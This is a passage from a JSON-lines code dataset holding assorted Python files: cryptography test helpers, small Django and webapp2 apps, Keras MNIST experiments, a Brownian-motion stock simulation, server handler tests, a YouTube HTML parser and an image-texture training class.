only_if,\n skip_message\n )\n return test_stream_encryption\n\n\ndef stream_encryption_test(backend, cipher_factory, params, only_if,\n skip_message):\n if not only_if(backend):\n pytest.skip(skip_message)\n plaintext = params.pop(\"plaintext\")\n ciphertext = params.pop(\"ciphertext\")\n offset = params.pop(\"offset\")\n cipher = Cipher(cipher_factory(**params), None, backend=backend)\n encryptor = cipher.encryptor()\n # throw away offset bytes\n encryptor.update(b\"\\x00\" * int(offset))\n actual_ciphertext = encryptor.update(binascii.unhexlify(plaintext))\n actual_ciphertext += encryptor.finalize()\n assert actual_ciphertext == binascii.unhexlify(ciphertext)\n decryptor = cipher.decryptor()\n decryptor.update(b\"\\x00\" * int(offset))\n actual_plaintext = decryptor.update(binascii.unhexlify(ciphertext))\n actual_plaintext += decryptor.finalize()\n assert actual_plaintext == binascii.unhexlify(plaintext)\n\n\ndef generate_hash_test(param_loader, path, file_names, hash_cls,\n only_if=None, skip_message=None):\n def test_hash(self):\n for backend in _ALL_BACKENDS:\n for file_name in file_names:\n for params in load_vectors_from_file(\n os.path.join(path, file_name),\n param_loader\n ):\n yield (\n hash_test,\n backend,\n hash_cls,\n params,\n only_if,\n skip_message\n )\n return test_hash\n\n\ndef hash_test(backend, algorithm, params, only_if, skip_message):\n if only_if is not None and not only_if(backend):\n pytest.skip(skip_message)\n msg = params[0]\n md = params[1]\n m = hashes.Hash(algorithm, backend=backend)\n m.update(binascii.unhexlify(msg))\n expected_md = md.replace(\" \", \"\").lower().encode(\"ascii\")\n assert m.finalize() == binascii.unhexlify(expected_md)\n\n\ndef generate_base_hash_test(algorithm, digest_size, block_size,\n only_if=None, skip_message=None):\n def test_base_hash(self):\n for backend in _ALL_BACKENDS:\n yield (\n base_hash_test,\n backend,\n algorithm,\n digest_size,\n block_size,\n only_if,\n skip_message,\n )\n return test_base_hash\n\n\ndef base_hash_test(backend, algorithm, digest_size, block_size, only_if,\n skip_message):\n if only_if is not None and not only_if(backend):\n pytest.skip(skip_message)\n\n m = hashes.Hash(algorithm, backend=backend)\n assert m.algorithm.digest_size == digest_size\n assert m.algorithm.block_size == block_size\n m_copy = m.copy()\n assert m != m_copy\n assert m._ctx != m_copy._ctx\n\n m.update(b\"abc\")\n copy = m.copy()\n copy.update(b\"123\")\n m.update(b\"123\")\n assert copy.finalize() == m.finalize()\n\n\ndef generate_long_string_hash_test(hash_factory, md, only_if=None,\n skip_message=None):\n def test_long_string_hash(self):\n for backend in _ALL_BACKENDS:\n yield(\n long_string_hash_test,\n backend,\n hash_factory,\n md,\n only_if,\n skip_message\n )\n return test_long_string_hash\n\n\ndef long_string_hash_test(backend, algorithm, md, only_if, skip_message):\n if only_if is not None and not only_if(backend):\n pytest.skip(skip_message)\n m = hashes.Hash(algorithm, backend=backend)\n m.update(b\"a\" * 1000000)\n assert m.finalize() == binascii.unhexlify(md.lower().encode(\"ascii\"))\n\n\ndef generate_hmac_test(param_loader, path, file_names, algorithm,\n only_if=None, skip_message=None):\n def test_hmac(self):\n for backend in _ALL_BACKENDS:\n for file_name in file_names:\n for params in load_vectors_from_file(\n os.path.join(path, file_name),\n param_loader\n ):\n yield (\n hmac_test,\n backend,\n algorithm,\n params,\n only_if,\n skip_message\n )\n return test_hmac\n\n\ndef hmac_test(backend, algorithm, params, only_if, skip_message):\n if only_if is not None and not only_if(backend):\n pytest.skip(skip_message)\n msg = params[0]\n md = params[1]\n key = params[2]\n h = hmac.HMAC(binascii.unhexlify(key), algorithm, backend=backend)\n h.update(binascii.unhexlify(msg))\n assert h.finalize() == binascii.unhexlify(md.encode(\"ascii\"))\n\n\ndef generate_base_hmac_test(hash_cls, only_if=None, skip_message=None):\n def test_base_hmac(self):\n for backend in _ALL_BACKENDS:\n yield (\n base_hmac_test,\n backend,\n hash_cls,\n only_if,\n skip_message,\n )\n return test_base_hmac\n\n\ndef base_hmac_test(backend, algorithm, only_if, skip_message):\n if only_if is not None and not only_if(backend):\n pytest.skip(skip_message)\n key = b\"ab\"\n h = hmac.HMAC(binascii.unhexlify(key), algorithm, backend=backend)\n h_copy = h.copy()\n assert h != h_copy\n assert h._ctx != h_copy._ctx\n","sub_path":"tests/hazmat/primitives/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"449519049","text":"# That there are no users with tty sessions logged into the server\nimport subprocess\nimport os\n\ndef tty_session():\n\tresult = subprocess.check_output([\"who\"])\n\tno_of_lines = result.split('\\n')\n\tif len(no_of_lines) > 1:\n\t\treturn 1\n\telse:\n\t\treturn 0\n","sub_path":"tty_session.py","file_name":"tty_session.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"200334261","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('course', '0056_facility_tweaks'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='gradechange',\n name='attempt_id',\n field=models.CharField(default=b'main', max_length=50, null=True, help_text=b\"Grade changes are grouped by their 'attempt ID' where later grades with the same attempt ID supersede earlier ones.\", blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"course/migrations/0057_default_attempt_id_to_main.py","file_name":"0057_default_attempt_id_to_main.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"290919174","text":"#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport webapp2\nimport logging\nimport random\nimport jinja2\nimport os\nimport time\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n # self.response.write('I am the King!!!
')\n # self.response.write('
Math with 7 and 14')\n template_vars = {\"timeofday\": time.asctime()}\n template = jinja_environment.get_template('templates/hello.html')\n self.response.write(template.render(template_vars))\n\nclass FormHandler(webapp2.RequestHandler):\n def post(self):\n realname = self.request.get(\"realname\")\n self.response.write(\"It Worked!! Name entered is: \" + realname)\n\nclass CounterHandler(webapp2.RequestHandler):\n def get(self):\n s = self.request.GET['startvalue']\n for i in range(int(s), 101):\n self.response.write(i)\n self.response.write(' ')\n\nclass GetUpHandler(webapp2.RequestHandler):\n def get(self):\n time = random.randint(0, 12)\n self.response.write('You worked on coding for ')\n self.response.write(time)\n self.response.write(' hours. ')\n if time > 3:\n self.response.write('Everybody get up and stretch!!! - Rob')\n else:\n self.response.write('Keep Going!!!!')\n\nclass MathHandler(webapp2.RequestHandler):\n def get(self):\n left = self.request.GET['left']\n sign = self.request.GET['sign']\n right = self.request.GET['right']\n # logging.info('LEFT=' + left)\n # self.response.write(\"It Worked!! Name entered is: \" + realname)\n # self.response.write(left)\n # self.response.write(sign)\n # self.response.write(right)\n # self.response.write(' = ')\n if sign == '+':\n answer = (float(left) + float(right))\n if sign == '-':\n answer = (float(left) - float(right))\n if sign == '*':\n answer = (float(left) * float(right))\n if sign == '/':\n answer = (float(left) / float(right))\n if sign == '%':\n answer = (float(left) % float(right))\n if sign == '^':\n answer = (pow(float(left), float(right))) #(left ** right)<--same\n expression = left + \" \" + sign + \" \" + right + \" = \"\n template_vars = {'ans': answer, 'exp': expression}\n template = jinja_environment.get_template('templates/answer.html')\n self.response.write(template.render(template_vars))\n self.response.write('
')\n\njinja_environment = jinja2.Environment(loader=\n jinja2.FileSystemLoader(os.path.dirname(__file__)))\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler),\n ('/count', CounterHandler),\n ('/stretch', GetUpHandler),\n ('/math', MathHandler),\n ('/formhandler', FormHandler)\n], debug=True)\n","sub_path":"appengine-practice/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"580243764","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\BitBucket\\djmicrosip_apps\\djmicrosip_reorden\\djmicrosip_reorden\\urls.py\n# Compiled at: 2016-02-03 17:34:37\nfrom django.conf.urls import patterns\nfrom . import views\nurlpatterns = patterns('', (\n '^$', views.index), (\n '^generar/$', views.genera_view), (\n '^generar_entradas/$', views.generaentrada_view), (\n '^generar_pedido/$', views.generapedido_view), (\n '^entradas_automaticas/$', views.entradas_automaticas_view), (\n '^salidas_automaticas/$', views.salidas_automaticas_view), (\n '^generar_auto/$', views.genera_auto_view), (\n '^preferencias/$', views.preferencias_view), (\n '^actualizar/$', views.UpdateDatabaseTable), (\n '^crea_documento/$', views.crea_documento_view))","sub_path":"pycfiles/djmicrosip_reorden-1.2.0/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"305716655","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Flatten, Input, Dropout\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint \n\n# 1. 데이터\n(x_train, y_train), (x_test, y_test) = mnist.load_data() # mnist 예제의 좋은기능 train set 과 test set을 나눠주는 기능이 있음\n\nprint(x_train.shape, x_test.shape) # (60000, 28, 28) (10000, 28, 28)\nprint(y_train.shape, y_test.shape) # (60000, ) (10000, )\n\n# 데이터 전처리 1.OneHotEncoding\nfrom tensorflow.keras.utils import to_categorical # 분류모델에서는 onehotencoding 필수\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\n\nprint(y_train.shape)\nprint(y_test.shape)\n\nx_train = x_train.reshape(60000, 28 * 28).astype(\"float32\") / 255. # .astype(\"type\") => 형 변환\nx_test = x_test.reshape(10000, 28 * 28).astype(\"float32\") / 255.\n\n# 2. 모델\nfrom tensorflow.keras.optimizers import Adam, RMSprop, Adadelta\nfrom tensorflow.keras.activations import selu, elu, relu\nfrom tensorflow.keras.layers import Activation, ReLU, ELU, LeakyReLU\n\n# keras model을 함수형태로 만들었음\ndef build_model(activation, drop = 0.5, optimizer = Adam, learning_rate = 0.001, node = 100 ):\n inputs = Input(shape = (28*28, ), name = 'input')\n\n x = Dense(256, activation = 'relu', name = 'hidden1')(inputs)\n x = Dropout(drop)(x)\n\n x = Dense(128, name = 'hidden2')(x)\n x = Activation(activation)(x)\n x = Dropout(drop)(x)\n\n x = Dense(64, name = 'hidden3')(x)\n x = LeakyReLU(alpha=0.3)(x)\n x = Dropout(drop)(x)\n\n outputs = Dense(10, activation='softmax', name = 'outputs')(x)\n\n model = Model(inputs = inputs, outputs = outputs)\n # early_stopping = EarlyStopping(monitor = 'val_loss', patience = stop)\n model.compile(optimizer = optimizer(learning_rate = learning_rate), metrics = ['accuracy'], loss = 'categorical_crossentropy')\n\n print(activation)\n print(optimizer)\n print(learning_rate)\n print(node)\n return model\n\n# GridSearch parameter 함수\ndef create_hyperparameter(): # 파라미터를 지정해줄때의 이름과 모델 함수에 들어있는 파라미터 변수 이름을 동일시켜야함\n batches = [30]\n # learning_rate = [0.1, 0.05, 0.001]\n learning_rate = [0.001]\n # optimizers = [Adam, RMSprop, Adadelta]\n optimizers = [RMSprop]\n # drop = np.linspace(0.1, 0.5, 5) # numpy가 아닌 튜플로 넣어주면 에러가 안생김\n dropout = [0.3]\n epochs = [3]\n node = [128] \n activation = ['relu', 'selu', 'elu']\n return{\"batch_size\" : batches, \"optimizer\" : optimizers, \"drop\" : dropout, \"epochs\" : epochs, \"learning_rate\" : learning_rate, \"node\" : node, \"activation\" : activation}\n\nhyperparameters = create_hyperparameter()\n\n# keras 모델을 sklearn에서 사용할수있게 바꿔주는 기능\nfrom tensorflow.keras.wrappers.scikit_learn import KerasClassifier\nmodel = KerasClassifier(build_fn=build_model, verbose = 1)\n\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nsearch = RandomizedSearchCV(model, hyperparameters, cv = 3)\nsearch.fit(x_train, y_train)\n\n# print(search.best_params_)\n\n# score = search.score(x_test, y_test)\n# print(\"최종 스코어 : \", score)\n\n# 결과\n# {'optimizer': 'adam', 'epochs': 50, 'drop': 0.3, 'batch_size': 30}\n# 334/334 [==============================] - 0s 1ms/step - loss: 0.1437 - accuracy: 0.9842\n# 최종 스코어 : 0.9842000007629395","sub_path":"keras2/keras72_RS_Activation.py","file_name":"keras72_RS_Activation.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"644723239","text":"from tensorflow.keras.layers import Input, Dense\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.datasets import mnist # データ読み込み用\nfrom tensorflow.keras.utils import to_categorical # データ読み込み用\n\n# Inputレイヤーからスタート(返り値はテンソル)\ninputs = Input(shape=(784,))\n\n# レイヤークラスのインスタンスはテンソルを引数に取れる(返り値はテンソル)\n# InputレイヤーとDenseレイヤー(1層目)を接続\nx = Dense(128, activation='relu')(inputs)\n\n# Denseレイヤー(1層目)とDenseレイヤー(2層目)を接続\nx = Dense(64, activation='relu')(x)\n\n# レイヤーのインスタンス化を切り分けることももちろん可能\noutput_layer = Dense(10, activation='softmax')\n\n# (別のモデル構成時にこのレイヤーを指定・再利用することも可能になる)\n# Denseレイヤー(2層目)とDenseレイヤー(3層目)を接続\npredictions = output_layer(x)\n\n# Modelクラスを作成(入力テンソルと出力テンソルを指定すればよい)\n# これで、「(784,)のInputを持つDense3層」構成のモデルが指定される\nmodel = Model(inputs=inputs, outputs=predictions)\n\n# 以降はSequentialと同じ\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train = x_train.reshape(-1, 784)\nx_test = x_test.reshape(-1, 784)\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\n\nmodel.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])\nmodel.fit(x_train, y_train)\n\nprint(model)\n","sub_path":"src/lesson4/lesson_4_1.py","file_name":"lesson_4_1.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"334889491","text":"# simulate brownian motion\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Plot grayscale\nplt.style.use('grayscale')\n\nn=252 # full year in trading days\ndt=0.00001 # to be somewhat stable in time\n\nx=pd.DataFrame()\n\n#np.random.seed(1)\n\ndef makeFig():\n\tx.columns=['V','SAP','JPM','MSFT', 'AAPL','INTC','MITT']\n\t#stock=['V','SAP','JPM','MSFT','AAPL','INTC','MITT']\n\t#colstock=['blue','orange','green','red', 'pink','yellow', 'olive']\n\tcolumncols = ['blue','orange','green','red','pink','yellow', 'olive']\n\tx.plot(color = columncols)\n\tplt.legend(x.columns)\n\tplt.xlabel('t')\n\tplt.ylabel('X')\n\tplt.title('brownian motion finance model with averaged inputs')\n\tplt.show()\n\n\t\ndef GBM(x0, mu, sigma):\n\tx=pd.DataFrame()\n\tdef local(x0,mu,sigma):\n\t\tstep=np.exp((mu-sigma**2/2)*dt)*np.exp(sigma*np.random.normal(0,np.sqrt(dt),(1,n)))\n\t\treturn [x0*step.cumprod()]\n\t# for s in range(0,3):\n\t\t# if s == 0:\n\t\t\t# tmp = np.concatenate((local(x0,mu,sigma),local(x0,mu,sigma)),axis = 0)\n\t\t# else:\n\t\t\t# tmp = np.concatenate((tmp,local(x0,mu,sigma)),axis = 0)\n\t# ttt = np.mean(tmp,0)\n\treturn pd.DataFrame(local(x0,mu,sigma))\n\t\n# task: GBM with stochastic volatility\ndef GMBstochVolal(x0,mu,sigma,sigmasigma):\n\t\"\"\"drive sigma with own GBM using sigmasigma as sigma\"\"\"\n\treturn NotImplementedError\n\ndef sumup():\n\tx=pd.DataFrame()\n\t# VISA\n\tx0 = 107.4# start value\n\tmu = 1.15# estimate\n\tsigma = 11.79# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\t\t\n\t# SAP\n\tx0 = 113.21# start value\n\tmu = 1.03# estimate\n\tsigma = 5.16# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\t\n\t# JPM\n\tx0 = 95.224# start value\n\tmu = 1.083# estimate\n\tsigma = 7.88# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\n\t# MSFT\n\tx0 = 74.72# start value\n\tmu = 1.14# estimate\n\tsigma =10.469# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\n\t# # AAPL\n\t# x0 = 173.332# start value\n\t# mu = 1.184# estimate\n\t# sigma = 15.6109# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\n\t# INTC\n\tx0 = 32.4168# start value\n\tmu = 1.0641# estimate\n\tsigma = 5.6348# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\n\t# MITT\n\tx0 = 17.23028# start value\n\tmu = 1.006119# estimate\n\tsigma = 0.9179# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\t\n\treturn x\n\nfor s in range(1000):\t\n\tif np.mod(s,50) == 0:\n\t\tprint('called')\n\tx = pd.concat([x,sumup().sum(level=0)],axis=0)\n\n\t\n# # plot some shit\n# makeFig()\n\t\nplt.plot(np.mean(x,0))\nplt.plot(np.mean(x,0)+np.std(x,0))\nplt.plot(np.mean(x,0)-np.std(x,0))\nplt.show()\n\t\n\n\n","sub_path":"BrownianBridgeMarketTiming.py","file_name":"BrownianBridgeMarketTiming.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"520323565","text":"from datetime import datetime\nfrom dateutil.parser import isoparse\nfrom dateutil.tz import tzutc\n\nfrom unittest import TestCase\nfrom unittest.mock import Mock, patch\n\nfrom fdbk import DictConnection\nfrom fdbk.server import parse_filter_parameters, ServerHandlers, generate_app\nfrom fdbk.server._server_handlers import _get_overwrite\n\nfrom test_data_tools import AGGREGATE_ALWAYS_DATA, AGGREGATE_ALWAYS_TOPIC\n\nclass ServerHandlersTest(TestCase):\n def _assert_status(self, expected_status, function, *args, **kwargs):\n data, status = function(*args, **kwargs)\n self.assertEqual(status, expected_status, f'data={str(data)}')\n return data\n\n def _create_topic(self, server_handlers, topic):\n response = self._assert_status(200, server_handlers.add_topic, topic)\n return response.get(\"topic_id\")\n\n def test_server_from_plugin_name(self):\n generate_app(db_plugin='dict', db_parameters=[])\n\n def test_parse_filter_parameters(self):\n params = dict(\n since=\"2020-04-26T19:18:14.123456Z\",\n until=\"2020-04-26T19:18:14.123456Z\",\n limit=\"123\",\n aggregate_to=\"25\",\n aggregate_with=\"min\",\n asd=\"asd\"\n )\n\n for include_aggretate in (True, False):\n parsed = parse_filter_parameters(params, include_aggretate)\n self.assertEqual(parsed.get(\"since\"), datetime(2020,4,26,19,18,14,123456, tzutc()))\n self.assertEqual(parsed.get(\"until\"), datetime(2020,4,26,19,18,14,123456, tzutc()))\n self.assertEqual(parsed.get(\"limit\"), 123)\n if include_aggretate:\n self.assertEqual(parsed.get(\"aggregate_to\"), 25)\n self.assertEqual(parsed.get(\"aggregate_with\"), \"min\")\n else:\n self.assertIsNone(parsed.get(\"aggregate_to\"))\n self.assertIsNone(parsed.get(\"aggregate_with\"))\n self.assertIsNone(parsed.get(\"asd\"))\n\n def test_get_overwrite(self):\n self.assertTrue(_get_overwrite(dict(overwrite=\"true\")))\n self.assertTrue(_get_overwrite(dict(overwrite=\"TrUe\")))\n self.assertFalse(_get_overwrite(dict(overwrite=\"cat\")))\n self.assertFalse(_get_overwrite(dict(animal=\"cow\")))\n\n def test_parse_filter_parameters_catches_parsing_error(self):\n parsed = parse_filter_parameters(dict(limit=\"cow\"))\n self.assertIsNone(parsed.get(\"limit\"))\n\n def test_add_topic_returns_400_when_topic_name_missing(self):\n s = ServerHandlers(DictConnection())\n self._assert_status(400, s.add_topic, {})\n\n def test_add_topic_returns_400_when_topic_data_is_invalid(self):\n s = ServerHandlers(DictConnection())\n self._assert_status(400, s.add_topic, dict(name=\"test\", fields=123))\n\n def test_add_topic_returns_200_on_success(self):\n s = ServerHandlers(DictConnection())\n self._assert_status(200, s.add_topic, dict(name=\"topic\"))\n\n def test_add_data_get_data_and_get_latest_and_get_summary_get_overview(self):\n s = ServerHandlers(DictConnection())\n\n self._assert_status(404, s.get_latest, None)\n\n data_tools = [\n {\"field\":\"number\", \"method\":\"line\"},\n ]\n topic_id = self._create_topic(s, dict(name=\"topic\", fields=[\"number\"], data_tools=data_tools))\n\n self._assert_status(404, s.get_latest, topic_id)\n\n response = self._assert_status(200, s.get_data, topic_id, {})\n self.assertEqual(len(response), 0)\n\n self._assert_status(200, s.add_data, topic_id, dict(number=3))\n\n response = self._assert_status(200, s.get_latest, topic_id)\n self.assertEqual(response.get(\"number\"), 3)\n\n self._assert_status(200, s.add_data, topic_id, dict(number=3))\n\n response = self._assert_status(200, s.get_data, topic_id, {})\n self.assertEqual(len(response), 2)\n\n self._assert_status(200, s.get_summary, topic_id, {})\n\n for i in range(5):\n self._assert_status(200, s.add_data, topic_id, dict(number=i))\n\n response = self._assert_status(200, s.get_overview, None, dict(aggregate_to=3))\n data = response[\"statistics\"][0][\"payload\"][\"data\"][\"datasets\"][0][\"data\"]\n self.assertLessEqual(len(data), 3)\n\n def test_add_data_validations(self):\n s = ServerHandlers(DictConnection())\n\n self._assert_status(404, s.add_data, None, dict(number=3))\n\n topic_id = self._create_topic(s, dict(name=\"topic\", fields=[\"number\"]))\n self._assert_status(400, s.add_data, topic_id, dict(letter=\"a\"))\n\n def test_get_topic(self):\n s = ServerHandlers(DictConnection())\n\n self._assert_status(404, s.get_topic, None)\n topic_id = self._create_topic(s, dict(name=\"topic\", fields=[\"number\"]))\n self._assert_status(200, s.get_topic, topic_id)\n\n def test_aggregate(self):\n s = ServerHandlers(DictConnection())\n topic_id = self._create_topic(s, AGGREGATE_ALWAYS_TOPIC)\n for data in AGGREGATE_ALWAYS_DATA:\n data['timestamp'] = isoparse(data['timestamp']).replace(tzinfo=None)\n self._assert_status(200, s.add_data, topic_id, data)\n\n tests = [\n (s.get_summary, (topic_id, dict(aggregate_to=\"5\", aggregate_with='sum')), 4),\n (s.get_summary, (topic_id, dict(aggregate_to=\"5\", aggregate_with='sum', aggregate_always=\"tRuE\")), 2),\n (s.get_overview, (None, dict(aggregate_to=\"5\", aggregate_with='sum')), 4),\n (s.get_overview, (None, dict(aggregate_to=\"5\", aggregate_with='sum', aggregate_always=\"True\")), 2),\n ]\n\n for fn, params, count in tests:\n data = self._assert_status(200, fn, *params)\n aggregated = data['statistics'][0]['payload']['data']['datasets'][0]['data']\n self.assertEqual(len(aggregated), count)\n","sub_path":"tst/test_server_handlers.py","file_name":"test_server_handlers.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"200435972","text":"# -*- coding: utf-8 -*-\nimport re\nfrom collections import namedtuple\nfrom pyquery import PyQuery\n\nYoutubeMV = namedtuple('YoutubeMV', 'title cover play_url view_count runtime')\n\n\ndef get_view_count(aria_label):\n search_result = re.search('([0-9,]+) views', aria_label)\n if not search_result:\n return 0\n return int(search_result.group(1).replace(',', ''))\n\n\ndef get_runtime(duration):\n segs = duration.split(':')\n if len(segs) == 3:\n return int(segs[0]) * 3600 + int(segs[1]) * 60 + int(segs[2])\n if len(segs) == 2:\n return int(segs[0]) * 60 + int(segs[1])\n if len(segs) == 1:\n return int(duration) if duration.isdigit() else 0\n return 0\n\n\ndef parse(file_name):\n result = []\n with open(file_name) as f:\n page = PyQuery(f.read())\n videos = page(\"div[id='content']\")\n for video in videos:\n a = video.xpath('./a/ytd-thumbnail/a')\n if not a:\n continue\n\n play_url = a[0].get('href')\n\n img = a[0].xpath('./yt-img-shadow/img')\n if not img:\n continue\n\n cover = img[0].get('src')\n\n overlay = a[0].xpath('./div/ytd-thumbnail-overlay-time-status-renderer')\n if not overlay:\n continue\n\n runtime = get_runtime(overlay[0].text_content().strip())\n video_title = video.xpath('./a/div/h3/span')\n if not video_title:\n continue\n\n title = video_title[0].get('title')\n aria = video_title[0].get('aria-label')\n view_count = get_view_count(aria)\n\n result.append(YoutubeMV(\n title=title,\n cover=cover,\n play_url=play_url,\n view_count=view_count,\n runtime=runtime\n ))\n\n return result\n\nif __name__ == '__main__':\n print(parse('aaa.html'))\n","sub_path":"scripts/parse_youtube_playlist.py","file_name":"parse_youtube_playlist.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"104891671","text":"import os\r\nimport math\r\nimport cv2\r\nimport csv\r\nfrom skimage.feature import local_binary_pattern\r\nfrom scipy.stats import itemfreq\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn.externals import joblib\r\nimport cvutils\r\n\r\nfrom LBP.AOP import Aspects\r\n\r\n\r\nclass TrainingModel(object):\r\n def __init__(self):\r\n self._train_images = None\r\n self._train_dict = None\r\n self._normalized_histograms = []\r\n self._image_paths = []\r\n self._class_labels = []\r\n\r\n @Aspects.param_validator\r\n def set_train_images(self, training_set_path):\r\n try:\r\n self._train_images = cvutils.imlist(training_set_path)\r\n except AssertionError as ae:\r\n print(ae)\r\n\r\n @property\r\n def train_images(self):\r\n return self._train_images\r\n\r\n # @Aspects.param_validator\r\n # @Aspects.file_checker\r\n def set_train_dict(self, image_labels_path):\r\n raw_train_dict = dict()\r\n if os.path.exists(image_labels_path) and Aspects.file_checker(image_labels_path):\r\n with open(image_labels_path, 'rt') as csvfile:\r\n try:\r\n reader = csv.reader(csvfile, delimiter=' ')\r\n for row in reader:\r\n try:\r\n raw_train_dict[row[0]] = int(row[1])\r\n except IndexError:\r\n pass\r\n except csv.Error as e:\r\n print(e)\r\n else:\r\n print(\"No suitable file for image labels: {}\".format(image_labels_path))\r\n\r\n self._train_dict = raw_train_dict\r\n\r\n @property\r\n def train_dict(self):\r\n return self._train_dict\r\n\r\n def set_raw_results(self):\r\n raw_histograms = []\r\n raw_img_paths = []\r\n raw_class_labels = []\r\n if self.train_images:\r\n for train_image in self.train_images:\r\n print(\"Done with {} for training\".format(train_image))\r\n im = cv2.imread(train_image)\r\n im_gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY) # greyscale\r\n radius = 3\r\n no_points = 8 * radius # 8 neighbours, 24 points\r\n lbp_mask = local_binary_pattern(im_gray, no_points, radius, method='uniform')\r\n x = itemfreq(lbp_mask.ravel()) # calculate the histogram\r\n lbp_hist = x[:, 1] / sum(x[:, 1]) # normalize\r\n raw_histograms.append(train_image)\r\n raw_img_paths.append(lbp_hist)\r\n raw_class_labels.append(self.train_dict[os.path.split(train_image)[1]])\r\n self._normalized_histograms = raw_histograms\r\n self._image_paths = raw_img_paths\r\n self._class_labels = raw_class_labels\r\n\r\n @property\r\n def normalized_histograms(self):\r\n return self._normalized_histograms\r\n\r\n @property\r\n def image_paths(self):\r\n return self._image_paths\r\n\r\n @property\r\n def class_labels(self):\r\n return self._class_labels\r\n\r\n @Aspects.param_validator\r\n @Aspects.exception_logger\r\n @Aspects.result_logger\r\n def serialize_raw_results(self, pickle_path):\r\n try:\r\n joblib.dump((self.normalized_histograms, self.image_paths, self.class_labels), pickle_path, compress=3)\r\n return pickle_path\r\n except(TypeError, KeyError):\r\n print(\"Something wrong\")\r\n return 0\r\n\r\n @Aspects.exception_logger\r\n @Aspects.result_logger\r\n @Aspects.path_exists\r\n def display_results(self):\r\n nrows = math.ceil((len(self.train_images)) / 3)\r\n ncols = 3\r\n fig, axes = plt.subplots(nrows, ncols)\r\n for row in range(nrows):\r\n for col in range(ncols):\r\n try:\r\n if Aspects.path_exists(self.image_paths[row * ncols + col]) and (row * ncols + col) < len(self.image_paths):\r\n axes[row][col].imshow(cv2.imread(self.image_paths[row * ncols + col]))\r\n axes[row][col].axis('off')\r\n axes[row][col].set_title(\"{}\".format(os.path.split(self.image_paths[row * ncols + col])[1]))\r\n except UnicodeDecodeError:\r\n print(self.image_paths[row*ncols + col])\r\n fig.canvas.draw()\r\n im_ts = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')\r\n im_ts = im_ts.reshape(fig.canvas.get_width_height()[::-1] + (3,))\r\n cv2.imshow(\"Training Set\", im_ts)\r\n cv2.waitKey()\r\n","sub_path":"LBP/training_model.py","file_name":"training_model.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"161330177","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*\r\n#\r\n# Written under Python 2.7 for Windows, not tested on Python 3\r\n#\r\n# Code by genBTC. Created from scratch 